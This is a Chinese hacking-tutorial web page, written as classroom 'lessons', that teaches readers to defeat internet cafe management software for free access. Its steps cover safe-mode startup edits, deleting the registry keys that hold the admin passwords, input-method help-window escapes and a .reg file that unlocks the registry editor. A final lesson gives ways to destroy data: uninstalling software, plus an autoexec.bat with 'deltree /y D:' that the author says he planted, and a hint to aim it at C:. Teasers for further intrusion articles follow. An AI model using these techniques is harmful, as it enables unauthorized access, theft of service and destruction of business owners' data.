菜鸟的网吧常见漏洞入侵

所属分类: 网络安全 / 黑客入侵 阅读数: 123
收藏 0 赞 0 分享

第一课 首先试试“安全模式”漏洞。
  到网吧后开机(不要管理员解锁),一会儿屏幕出现“Starting Windows ……”时,按下"F5"键启动到“安全模式”,在“开始”→“运行”框中输入“msconfig”(回车),打开“系统配置实用程序”,用鼠标单击“启动”标签,去掉所有与网管软件有关的项,也可以在运行框中输入“regedit”打开注册表,删除注册表“HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下的相关键值,更残忍的干脆把网管软件给卸载掉,重新启动计算机后,就可以免费上网了。是不是很简单?不过可要当心网吧老板!如果“F5”键被屏蔽了,则应该先修改“msdos.sys”。看看下面的“输入法”漏洞,大家就知道怎么修改了。
第二课(本课以“网吧管理专家”为例)
  照样先开机(启动过程别按“F5”),没有让管理员解锁的计算机在桌面上有一密码框,是用于验证用户身份的。这里分为会员和管理员,两种身份分别具有不同的使用权限。我不是管理员,所以我不知道管理员密码,在座有哪位知道的?(你不用拼命摇头啦!)没有密码照样能进入!我们可以绕到密码框后面去。用鼠标单击“会员卡号”框,利用“ctrl shift”或“Ctrl Space(空格键)”调出输入法,然后随意输入一个字母,在弹出的输入框上单击鼠标右键,看看有没有“帮助”。没有的话就用“Ctrl Shift”切换输入法,直到找出“帮助”后单击它。鼠标的移动范围被限制了,可以这样破解它:按下“Alt Space”,在弹出的标题栏菜单上(用键盘)选择“移动”,再回车两下就OK了。基础打好了,现在让我们看看这个网吧里有什么好东东,用鼠标单击“帮助”的标题栏图标(有一种帮助没有这个图标,这种帮助好像没什么利用价值)。打开控制菜单后,再单击“跳至 URL(J) ...”,在弹出的输入框中输入网址或盘符都可以,先去C盘看看,输入“C:”或“file:///C:/”。我找…… 似乎没什么好玩的。你看那网管软件,就放在这么显眼的地方,也不怕被人执行“Uninstall.exe”。…… 下面就开始上网了。:)去“新浪”逛逛,打开“跳至 URL(J)...”框,输入“www.sina.com.cn”(“回车”),大家让一让,发生什么事了?网页内容竟然在“帮助”里显示出来了!如果要去雅虎网站,还得再单击“跳至 URL(J) ...”,麻烦了点,不如去桌面上找个IE更方便些,这次还是得单击“跳至 URL(J)...”,输入“c:windowsdesktop”(回车),或者在刚才打开的c盘上任意选择一个文件夹,按“shift Enter(回车)”,调出资源管理器,也可以到达桌面。
  有些人想要管理员密码,你可以自已来设置一个,我惯用的方法是:打开注册表,删除“[Hkey_Local_MachineSoftware万象幻境专家系列管理软件]”下的键名“计算机解锁密码”和“运行设置程序密码”的键值(另外还有其他的密码,均已被编译,要删除就随你便啦!)改完后退出注册表并重新启动计算机,密码框不见了,然后依次单击“开始→设置→运行设置程序”,倘若你觉得该网吧限制太高,不妨把它设置低一点。如果注册表编辑器被禁止,就当我上面的话没说,我们可以用这种方法破解:
  1.在IE地址栏内输入“c:”,回车。
  2.单击“文件”菜单,新建一份文本文档,输入如下代码:
以下是代码片段:
 Regedit4
  [HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:01000000
  将文件另存为“1.reg”,把它双击安装后就可以使用注册表编辑器了。刚才提到怎样解除“F5”的限制,利用“帮助”漏洞来解除可以,但是我想利用“快速提示”漏洞。
第三课 “输入法”中的“快速提示”漏洞
  这节课教大家什么?嗯!是“输入法”中的“快速提示”漏洞,目前仅有“五笔加加”输入法有这个漏洞。照上节课教的,不过这次要大家找的是“快速提示”,而不是“帮助”,切换输入法,找到“快速提示”后单击它,这时出现一个IE窗口(不是太菜的你应该知道干什么用的,上网用的呗!),鼠标移动范围被限制了,破解它(上节课教过了,但是如果IE窗口是最大化的,则应该先在控制菜单中选择“恢复为小窗口”后再“移动”,再按“回车”),这样便可免费上网了,需要打开桌面,最简单的方法是:在IE地址栏上输入“桌面”(回车)。回顾一下第一节课主要说了什么……嗯!利用“F5”漏洞免费上网,大多被屏蔽掉了,第二节课说过要利用“快速提示”漏洞来解除它。怎么做呢?(大家笔拿起来做些笔记),“msdos.sys”文件在C盘根目录下一般是以“隐藏”和“只读”形式储存的,我们需要先去掉它的“只读”属性,要不然无法对它做任何修改,在IE地址栏上输入“file:///C:/command.com”回车,打开“ms-dos方式”,在提示符下输入 “attrib -r c:msdos.sys”(回车)以去掉“只读”属性,再返回到IE地址栏上输入“file:///C:/msdos.sys”(回车),把“打开方式”设为“记事本”,把“option”下的“BootKeys”的值改为“1”,保存退出。重新启动计算机便可使修改生效。
  上面讲的都是以“网吧管理专家”网管软件为例,如果是“美萍”控制的计算机,得先打开“开始→会员登陆”,接下来与“网吧管理专家”操作过程相同。再补充一点,其实免费上网还有一种方法,不过成功率不高,就是使网管软件出错,我是用键盘上的“Ctrl、Shift、Alt”三个键中任一键或任两键配合其他键狂按,结果网管软件报错退出,“我的电脑”和“回收站”等都出现在桌面上了。
第四课 一些破坏网吧数据的方法(那位耳朵伸得那么长,想必是网德不善者)。
  破坏1(破坏级别:中):
  
  在IE“地址栏”或“jump to URL”中输入“file:///c:/windows/control.exe”,打开“控制面板→ 添加/删除程序”,卸载掉你“感兴趣”的应用程序。
  破坏2(破坏级别:中→高):
  
  为了防止文件被删除,网管软件一般都屏蔽了鼠标右键,并且连键盘上的“Delete”和“Shift Delete”也无效,不过据我所知,在“网吧管理专家”控制下的数据可以用“Ctrl D”来删除。 so.bitsCN.com网管资料库任你搜
  破坏3(破坏级别:高):
  修改C盘根目录下的“autoexec.bat”文件为如下代码:
以下是代码片段:
@echo off
  path=c:windows;c:windowscommand
  smartdrv >nul
  deltree /y D:. >nul
  这些代码是我前段时间在某网吧里预留的,后果只是使硬盘D分区的数据全部丢失而已,但计算机仍可启动(因为操作系统被装在C盘),若将第四段代码的“D:”改为“C:”,有什么后果?你试试就知道了,像我这样心地善良,乐于助人的人,是不会那么做的。
更多精彩内容其他人还在看

一次透过SNIFF有目的性的入侵

一次透过SNIFF有目的性的入侵 所用武器:流光,SUPERSCAN3,HDOOR,NETCAT,3389客户端,X-SNIFF 宿舍装了ADSL,我疯狂地在网上看电影和在QQ里泡MM(也可能是恐龙吧 :( )。网络入侵和安全方面的学习已经荒废了好一段时间
收藏 0 赞 0 分享

渗透日本服务器群

因为这一局,渗透获取整个服务器群的权限,N台服务器。所以写篇文章小小虚荣下。^0^ 开局: 入手点是一个注射点:sa,内网, 轻车熟路写个vbs脚本,下好lcx,转发端口。 以下是引用片段: down.vbs iLocal = LCase(WScript.Ar
收藏 0 赞 0 分享

黑客入侵“在线影院”全过程2

遇阻:寻找VOD电影   首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。   可随后
收藏 0 赞 0 分享

黑客入侵“在线影院”全过程1

最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路
收藏 0 赞 0 分享

入侵藏在防火墙后面的机子

事情是这样的: 遭遇一台湾的dns服务器,win2003 server 扫描器报告的开放端口:21,53,80 ok,弄到一个sa权限的注射点,很爽得拿到一个webshell,透过sqlrootkit,俺就是system权限了.本以为对方菜到家了.谁知故事才刚刚开始.
收藏 0 赞 0 分享

看清黑客穿透ADSL路由入侵内网

也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。 一.扫描 现在很多ADSL MODEM都是通过80、2
收藏 0 赞 0 分享

对台湾视频站点的再次渗透尝试

这篇叙述性较强的日志文献将全程记录这次渗透,不管成败如何。我将站在教程的角度去表述。希望给大家完整的渗透入侵的感觉。 ------------------------------------------------------------------------------
收藏 0 赞 0 分享

3389端口攻击方法

WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。 WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用
收藏 0 赞 0 分享

详尽了解黑客入侵 WindowsXP系统的方法

这里将向你揭示黑客入侵Windows XP操作系统常用的七种方法。 第一招、屏幕保护 在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时
收藏 0 赞 0 分享

开3389的5种方法

怎么样开3389端口,这里我把他们总结一下,很全面,希望对你有用: 1,打开记事本,编辑内容如下: echo [Components] > c:sql echo TSEnable = on >> c:sql sysocmgr /i:c
收藏 0 赞 0 分享
查看更多